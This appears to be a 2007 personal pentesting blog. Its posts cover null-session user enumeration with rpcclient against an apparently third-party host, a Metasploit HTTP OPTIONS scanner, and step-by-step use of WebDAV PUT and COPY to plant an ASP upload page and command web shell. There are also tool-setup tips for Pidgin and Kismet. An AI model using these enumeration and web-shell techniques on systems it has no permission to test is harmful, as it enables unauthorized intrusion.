Wednesday, August 29, 2007
More of using rpcclient to find usernames
null sessions still rule in 2007...
cg@segfault:~$ rpcclient -U "" x.x.3.96
Password:
rpcclient $> lsaenumsid
found 11 SIDs
S-1-5-6
S-1-5-32-551
S-1-5-32-547
S-1-5-32-545
S-1-5-32-544
S-1-5-21-2000478354-1708537768-1957994488-501 <--guest
S-1-5-21-2000478354-1708537768-1957994488-500 <--administrator
S-1-5-21-2000478354-1708537768-1957994488-1002
S-1-5-21-2000478354-1708537768-1957994488-1001
S-1-5-21-2000478354-1708537768-1957994488-1000
S-1-1-0
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-501
S-1-5-21-2000478354-1708537768-1957994488-501 NSL09\Convidado (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-500
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\Administrador (1)
rpcclient $> lookupnames Administrador
Administrador S-1-5-21-2000478354-1708537768-1957994488-500 (User: 1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-502
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-503
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-503
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-504
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-505
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-506
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1000
S-1-5-21-2000478354-1708537768-1957994488-1000 NSL09\TsInternetUser (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1001
S-1-5-21-2000478354-1708537768-1957994488-1001 NSL09\IUSR_NSL09 (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1002
S-1-5-21-2000478354-1708537768-1957994488-1002 NSL09\IWAM_NSL09 (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1003
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1004
result was NT_STATUS_NONE_MAPPED
rpcclient $> exit
There you have it:
rpcclient rpcclient $> lgt; lookupsids S-1-5-21-2000478354-1708537768-1957994488-500
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\Administrador (1)
oh and thanks for the name of the box too :-)
fun rpcclient info: http://uw714doc.sco.com/en/samba/rpcclient.1.html
-CG
Sunday, August 26, 2007
BackTrack2 is NOT an operating system!!!
here is one of them link; i dont feel like looking up the rest (really not the point) but this has been going on for some time now (really since BT1).
OK i am going to vent for just a sec but i do have a point...
BACKTRACK IS NOT AN OPERATING SYSTEM! it is a TOOL!!
yes obviously you can run it as an operating system (hence the whole point of the rant) but why do your NEED to do that?
frankly the best education comes from building your own attack platform on the linux distro you installed, configured, and hardened yourself. You install, configure and mess with the tools YOU need to do your pentesting (or scanning your local ISP subnet) and dont have a bunch of extra crap you dont need. You get to work through library issues and crap breaking and getting so pissed at your box that you want to dropkick it out the window but guess what, you LEARN doing all that.
one of the biggest things i see over at LSO and during the rootwars is people having weak linux skills and not being able to compile and use their own tools, so naturally we ask what distro the run and mos of the time i get backtrack for an answer :-(
Dont get me wrong, i like backtrack2 as a TOOL, i boot the ISO in VMware i do what i need to do then i go back to my linux distro to read email and everything else. I have a couple of personal reasons for that one of them being denialability with the non-persistent option :-) but mostly for the reasons above; if i am going to go thru the trouble of installing a distro I might as well get something out of the install (linux knowledge-wise) instead of letting someone else do all the work for me.
just my thoughts on it. spend that effort installing that great set of tools that backtrack comes with on your own, you'll learn more and really get an idea if you actually NEED all of those tools and you get satisfaction of having control over your linux install.
-CG
Thursday, August 23, 2007
Should I be flattered or worried...
Sunday, August 19, 2007
Creating a HTTP OPTIONS auxiliary module for Metasploit
Basically i wanted to do:
cg@segfault:~/evil/msf3$ nc 192.168.0.109 80
OPTIONS * HTTP/1.0
HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Aug 2007 05:18:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 0
Accept-Ranges: bytes
DASL:
DAV: 1,2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Cache-Control: private
cg@segfault:~/evil/msf3$
but with a metasploit auxiliary module. so i got it going... mostly HD's module but i changed what needed to be changed to get it to work.
cg@segfault:~/evil/msf3$ ./msfconsole
____________
<>
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ msf v3.1-dev
+ -- --=[ 215 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux
msf > use auxiliary/scanner/http/options
msf auxiliary(options) > set RHOSTS 192.168.0.109
RHOSTS => 192.168.0.109
msf auxiliary(options) > run
[*] 192.168.0.109 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) > set RHOSTS www.carnal0wnage.com
RHOSTS => www.carnal0wnage.com
msf auxiliary(options) > run
[*] 69.64.54.104 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Auxiliary module execution completed
msf auxiliary(options) >
i'll post the code on carnal0wnage when i get off my butt and a little something something that gives you a status if you are scanning a Class C.
**more on getting code on the box once you find a PUT
cg@segfault:~$ curl -T test.txt http://192.168.0.109/test.txt http://192.168.0.109
then you have to do a MOVE or COPY request. personally i was having issues getting a MOVE request to work with a netcat connection, so i used...
**UPDATE
it ended up being the carriage returns (or lack thereof) that was causing me to get a 400 Bad Request error. I couldnt get the MOVE command to work, but the COPY command did.
cadaver http://www.webdav.org/cadaver/
cg@segfault:~$ cadaver
dav:!> open http://192.168.0.109
dav:/> put upload.asp
Uploading upload.asp to `/upload.asp':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 492 bytes succeeded.
dav:/> copy upload.txt upload.asp
Copying `/upload.txt' to `/upload.asp': succeeded.
dav:/> put upload.inc
Uploading upload.inc to `/upload.inc':
Progress: [=============================>] 100.0% of 5062 bytes succeeded.
dav:/> exit
from there you will want to upload your cmd.asp so you can execute commands on the box.
Browsing to upload.asp and uploading our cmd.asp (cmdx.aspx)
Interacting with out cmdx.aspx to list the directory contents of the C drive
-CG
Sunday, August 12, 2007
Getting the SILC plugin to work with pidgin on ubuntu 7.04
maybe its common knowledge to everyone else, but since i couldnt find a good answer with google i'll post up how i got the silc plugin and googletalk to work with pidgin on ubuntu 7.04.
first ubuntu has some stupid ass permissions on alot of stuff and you have to use sudo for everything, i'm still undecided if ubuntu is staying around, but this can even cause you to be unable to read files and folders that you own (like i said stupid)
well when you start up pidgin as your user account everything works pretty good, except when you try to run your silc module. you'll probably get a "cant create silc key pair" error. googling wont do you much good, and you'll look where it tells you the key is /home/$userid/.silc/public_key.pub & private_key.prv and you wont have any keys there. Copying keys over from another silc client. wont work.
so the fix is to run pidgin as root so it will generate the keys for you.
cg@segfault:~$ sudo pidgin
Password:
Public key has been saved into `/root/.silc/public_key.pub'.
Private key has been saved into `/root/.silc/private_key.prv'.
after that, copy those new spiffy keys from /root/ to your home directory
cg@segfault:~$ sudo su
root@segfault:/home/cg# cp /root/.silc/public_key.pub /home/cg/.silc/
root@segfault:/home/cg# cp /root/.silc/private_key.prv /home/cg/.silc/
things should work after that.
i also had issues with ssl support, google actually helped out this time and i found
http://developer.pidgin.im/wiki/FAQssl
you need to compile with the libgnutls package.
sudo apt-get install libgnutls-dev
then recompile from source
./configure --enable-gnutls
MSN and GoogleTalk should work after that.
Wednesday, August 8, 2007
Playing with Kismet
of course like a jackass, i wasnt backing up properly which is kind of a bummer but sometimes its always nice to start fresh, but if any of you ever sent me an email i wanted to keep, can you please resend it :-)
anyway, the silver lining of all of this is i got a new lappy (Toshibia A135-S4727) with a built in atheros card so i can finally use that hacking exposed wireless book i borrowed from work (and wont be returning) and can play with some of the wireless hack tools. I'm running Ubuntu 7.04 so it was fairly easy to get things up an running. A couple quick apt-get's and a little editing of the kismet conf file and i was up and running.
$sudo apt-get install madwifi-tools
$sudo apt-get install kismet
after you install the madwifi tools you should see the wifi0 interface when you do an ifconfig
wifi0 Link encap:UNSPEC HWaddr 00-19-7E-8A-BB-F4-00-00-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1399800 errors:113005 dropped:98619 overruns:0 frame:1332679
TX packets:98112 errors:2 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:199
RX bytes:283152996 (270.0 MiB) TX bytes:12557358 (11.9 MiB)
Interrupt:16
change directories into /etc/kismet and edit the kismet.conf file to use the madwifi_ag drivers
source=madwifi_ag,wifi0,Atheros
after that you should be good to go:
$sudo kismet
Links
http://www.kismetwireless.net/
http://www.wi-fiplanet.com/tutorials/article.php/3595531